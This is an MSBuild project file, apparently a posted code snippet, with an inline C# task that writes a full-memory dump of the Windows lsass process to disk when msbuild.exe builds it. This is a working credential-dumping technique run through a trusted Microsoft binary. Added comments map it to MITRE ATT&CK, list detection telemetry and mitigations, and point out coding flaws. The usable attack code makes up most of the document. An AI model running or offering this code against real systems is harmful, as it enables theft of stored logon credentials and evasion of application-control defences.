moriarty
3/1/2018 - 8:13 AM

MSBuild - Process Dumper - lsass example

MSBuild - Process Dumper - lsass example

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task compiles and executes the C# class below inside the msbuild.exe process (CodeTaskFactory). -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj -->
  <!-- Feel free to use a more aggressive class for testing. -->
  <Target Name="Hello">
   <ClassExample />
  </Target>
	<UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>
	<!-- <Reference Include="System.IO" /> Example Include -->		
      <Code Type="Class" Language="cs">
        <![CDATA[
			
			using System;
			using System.IO;
			using System.Diagnostics;
			using System.Runtime.InteropServices;
			using System.Security;
			
			using System.Reflection;
			using System.Runtime.Remoting;
			using System.Threading;
			using System.Globalization;
			
			using Microsoft.Build.Framework;
			using Microsoft.Build.Utilities;
				
			// MSBuild inline task. When the project is built, Execute() runs inside the
			// MSBuild process and writes a full-memory minidump of the first process
			// named "lsass" to a file in the current working directory.
			//
			// Detection and mitigation notes for this pattern:
			//  - Technique mapping: MITRE ATT&CK T1127.001 (MSBuild proxy execution) and
			//    T1003.001 (LSASS memory).
			//  - The process that opens LSASS and writes the dump is msbuild.exe (see the
			//    command line in the project header), so useful telemetry is msbuild.exe
			//    loading dbghelp.dll, a process-access event against lsass.exe
			//    (e.g. Sysmon Event ID 10), and creation of a "Dump*.dmp" file
			//    (e.g. Sysmon Event ID 11).
			//  - LSA protection (RunAsPPL), Credential Guard, the "Block credential
			//    stealing from lsass.exe" ASR rule, and application-control policies
			//    that restrict msbuild.exe are the usual controls against it.
			public class ClassExample :  Task, ITask
			{
				// Task entry point called by MSBuild. Prints a banner, triggers the dump,
				// and always returns true: CreateMiniDump() returns void, so the build
				// reports success whether or not a dump was actually written.
				public override bool Execute()
				{
					Console.WriteLine("Hello From MSBuildProcDump!");
					CreateMiniDump();
					return true;
				}
				
				// Flag values passed as the DumpType argument of MiniDumpWriteDump
				// (they mirror the dbghelp MINIDUMP_TYPE flags). Only
				// MiniDumpWithFullMemory is used in this file.
				public static class MINIDUMPTYPE
				{
					public const int MiniDumpNormal = 0x00000000;
					public const int MiniDumpWithDataSegs = 0x00000001;
					public const int MiniDumpWithFullMemory = 0x00000002;
					public const int MiniDumpWithHandleData = 0x00000004;
					public const int MiniDumpFilterMemory = 0x00000008;
					public const int MiniDumpScanMemory = 0x00000010;
					public const int MiniDumpWithUnloadedModules = 0x00000020;
					public const int MiniDumpWithIndirectlyReferencedMemory = 0x00000040;
					public const int MiniDumpFilterModulePaths = 0x00000080;
					public const int MiniDumpWithProcessThreadData = 0x00000100;
					public const int MiniDumpWithPrivateReadWriteMemory = 0x00000200;
					public const int MiniDumpWithoutOptionalData = 0x00000400;
					public const int MiniDumpWithFullMemoryInfo = 0x00000800;
					public const int MiniDumpWithThreadInfo = 0x00001000;
					public const int MiniDumpWithCodeSegs = 0x00002000;
				}

				// P/Invoke declaration for MiniDumpWriteDump in dbghelp.dll. The attribute
				// does not set SetLastError, so the Win32 error code of a failed call is
				// not captured. "CallackParam" is a misspelling of "CallbackParam"; the
				// name has no effect on marshalling.
				[DllImport("dbghelp.dll")]
				public static extern bool MiniDumpWriteDump(
					IntPtr hProcess, Int32 ProcessId, IntPtr hFile, int DumpType,
					IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallackParam);

				// Handler with the UnhandledException event signature that would write a
				// dump on a crash. Nothing in this class subscribes it to an event, so it
				// is never invoked as written.
				private static void CurrentDomainUnhandledException(
					object sender, UnhandledExceptionEventArgs e)
				{
					CreateMiniDump();
				}

				// Creates "Dump" + timestamp + ".dmp" and asks dbghelp to write a
				// full-memory dump of the first "lsass" process into it.
				public static void CreateMiniDump()
				{

					// Local time formatted with the invariant culture gives a name such as
					// Dump2018.03.01.08.13.00.dmp (constructed example).
					DateTime endTime = DateTime.Now;
					string dt = endTime.ToString("yyyy.MM.dd.HH.mm.ss", DateTimeFormatInfo.InvariantInfo);
					
					// Relative path: the file lands in the process's current working
					// directory. FileMode.Create overwrites an existing file of that name.
					// The stream is never closed or disposed in this method.
					string dumpFileName = "Dump" + dt +".dmp";
					FileStream fs = new FileStream(dumpFileName, FileMode.Create);
					
					// Lookup is by process name only; plist[0] throws
					// IndexOutOfRangeException if no process with that name is found.
					Process[] plist = Process.GetProcessesByName("lsass");
					Process process = plist[0];
					Console.WriteLine(process.Id); 
					// process.Handle opens a handle to the target process; this is the
					// access that process-access telemetry records and that LSA
					// protection (PPL) is designed to refuse. The bool result is
					// discarded, so a failed or blocked dump is silent and can leave an
					// empty .dmp file behind.
					MiniDumpWriteDump(
						process.Handle, process.Id, 
						fs.SafeFileHandle.DangerousGetHandle(),
						MINIDUMPTYPE.MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
					
				
				}
				
				
				
				
				
				
			}
			
		
			
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>